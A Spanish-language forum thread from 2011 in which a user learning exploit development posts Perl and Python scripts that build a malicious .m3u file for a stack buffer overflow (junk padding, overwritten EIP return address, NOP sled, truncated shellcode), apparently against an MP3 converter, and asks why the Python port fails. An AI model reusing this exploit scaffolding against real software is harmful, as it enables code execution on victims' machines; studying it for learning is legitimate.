problema al programar exploits en python

Iniciado por s0ud, 13 Mayo 2011, 00:59 AM

0 Miembros y 1 Visitante están viendo este tema.

s0ud

Buen día,

he estado aprendiendo sobre programar/escribir exploits de una pagina muy buena a mi parecer. la cuestion es que los ejemplos estan escritos en perl y yo quisiera utilizar python para hacer los exploits.

mi problema es al tratar de traducir la funcion pack de perl a python. en perl es muy facil:

my $eip = pack('V',0x7E429353); 

lo mas parecido que encontre en python es:

from struct import pack
eip = pack('<L',0x7E429353)

incluso estuve viendo codigo de otros explots en este lenguaje y asi es como lo hacen.

la cosa es que no funciona :S,  estoy utilizando python v2.7 (intente con la 3.2 pero tampoco)

aqui dejo el codigo del explot de prueba que utilizo, en perl y python (perl si me funciona)

PERL

my $file= "test1perlFinal.m3u";
my $junk= "A" x 26049;
my $eip = pack('V',0x7E429353); 

my $shellcode = "\x90" x 25;

$shellcode = $shellcode . "\xdb\xc0 ....  \x7b\xca";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);


Python

from struct import pack

filename = "test1.m3u"
junk = "\x41" * 26049
eip = pack('<L',0x7E429353)
espdata = "\x90" * 25
payload = "\xdb\xc0\ .... \xca"
FILE = open(filename,"wb")
FILE.write(junk+eip+espdata)
FILE.close()


será que no funciona por algo del codigo? segun yo, los 2 deberian de funcionar igual

si necesitan mas informacion puedo proporcionarla, nadamas pregunten

Gracias por su ayuda

warl0ck018

#1
Creo que es una falta de __Respeto__ la del amigo de arriba. Seguro dijiste eso porque pidiste ayuda con alguna tonteria que no merecio el tiempo de nadie.

Volviendo al tema importante. ¿Para que quieres pasar el exploit de perl a python?
Un Saludo

----

He editado el post porque encontre una pagina que te puede servir http://scx020c07c.blogspot.com.es/2012/09/buffer-overflow-easy-rm-to-mp3-converter.html
;)